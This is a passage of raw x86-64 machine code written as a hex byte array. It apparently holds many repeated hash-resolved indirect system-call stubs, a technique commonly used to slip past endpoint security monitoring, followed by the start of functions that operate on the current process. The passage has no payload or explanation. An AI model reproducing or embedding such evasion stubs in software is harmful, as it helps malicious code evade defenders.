48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x84,0x83,0x9C,0x09,0x51,0x48,0x83,0xEC,0x28,0xE8,0x25,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBA,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x87,0x5F,0xBE,0x1A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xCE,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x63,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xEA,0x62,0xBD,0xBC,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x74,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x09,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x6D,0xBA,0xD1,0x8A,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x1A,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xAF,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0F,0x98,0x97,0x8C,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xC0,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x55,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xA7,0x8C,0x3A,0xA6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x66,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xFB,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xF9,0x12,0x69,0xF0,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x0C,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xA1,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x18,0x39,0xA3,0x73,0x51,0x48,0x83,0xEC,0x28,0xE8,0xB5,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x4A,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xFB,0x5E,0xAB,0x7C,0x51,0x48,0x83,0xEC,0x28,0xE8,0x5E,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xF3,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1E,0x5C,0x98,0x38,0x51,0x48,0x83,0xEC,0x28,0xE8,0x07,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x9C,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x82,0x4D,0xDF,0x84,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xAD,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x42,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0C,0x86,0xB2,0xA1,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x53,0xF4,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE8,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x80,0x2D,0x1F,0x0A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xFC,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x91,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x13,0x36,0x82,0x14,0x51,0x48,0x83,0xEC,0x28,0xE8,0xA5,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x3A,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x8A,0xF2,0x3D,0xE6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x4B,0xF3,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE0,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x3A,0x3D,0xA8,0x32,0x51,0x48,0x83,0xEC,0x28,0xE8,0xF4,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x89,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x5C,0x59,0xF3,0x6A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x9D,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x32,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x6E,0x23,0x30,0xE8,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x43,0xF2,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD8,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0x55,0x3F,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0xEC,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x81,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x04,0x0E,0xDA,0x6B,0x51,0x48,0x83,0xEC,0x28,0xE8,0x95,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x2A,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x10,0xDE,0xB1,0x12,0x51,0x48,0x83,0xEC,0x28,0xE8,0x3E,0xF1,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD3,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x20,0x35,0x89,0x10,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE7,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x7C,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xB5,0x3A,0x1B,0x38,0x51,0x48,0x83,0xEC,0x28,0xE8,0x90,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x25,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x9C,0xD0,0xC6,0x20,0x51,0x48,0x83,0xEC,0x28,0xE8,0x39,0xF0,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xCE,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x3C,0xF4,0x9E,0xBA,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xDF,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x74,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x44,0x8D,0x66,0xCB,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x85,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x1A,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x8F,0x59,0x39,0x13,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2E,0xEF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xC3,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xBA,0x75,0xEB,0xB6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD4,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x69,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xEF,0xD9,0xB0,0x1B,0x51,0x48,0x83,0xEC,0x28,0xE8,0x7D,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x12,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE7,0x84,0xCD,0x0A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x26,0xEE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBB,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x37,0x04,0x96,0x36,0x51,0x48,0x83,0xEC,0x28,0xE8,0xCF,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x64,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x79,0x5C,0x2D,0x7A,0x51,0x48,0x83,0xEC,0x28,0xE8,0x78,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x0D,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x8F,0xCC,0x1A,0xCA,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x1E,0xED,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xB3,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x19,0xD6,0x26,0x0C,0x51,0x48,0x83,0xEC,0x28,0xE8,0xC7,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x5C,0xEC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x0B,0x60,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0xF4,0x01,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x1E,0x48,0x8D,0x05,0x1E,0x60,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC6,0x8D,0xFF,0xFF,0x48,0x8D,0x05,0x4A,0x60,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB7,0x8D,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x29,0x60,0x00,0x00,0x48,0x89,0xC2,0xB9,0x00,0x00,0x00,0x00,0xE8,0xA2,0x01,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x1E,0x48,0x8D,0x05,0x34,0x60,0x00,0x00,0x48,0x89,0xC1,0xE8,0x74,0x8D,0xFF,0xFF,0x48,0x8D,0x05,0xF8,0x5F,0x00,0x00,0x48,0x89,0xC1,0xE8,0x65,0x8D,0xFF,0xFF,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0x48,0x83,0x7D,0x18,0x00,0x74,0x06,0x83,0x7D,0x20,0x00,0x75,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0x28,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x85,0xC0,0x75,0x29,0xC7,0x45,0xF8,0x01,0x00,0x00,0x00,0x4C,0x8D,0x45,0x10,0xBA,0x28,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x60,0xED,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x88,0xD7,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xE9,0xB6,0x00,0x00,0x00,0x8B,0x45,0xF4,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0x01,0xD0,0x48,0x8B,0x10,0x48,0x8B,0x45,0x10,0x8B,0x4D,0x28,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xC9,0x00,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x44,0x83,0x7D,0xF8,0x00,0x74,0x3E,0x83,0x7D,0x28,0x00,0x74,0x38,0x8B,0x45,0xF4,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0x01,0x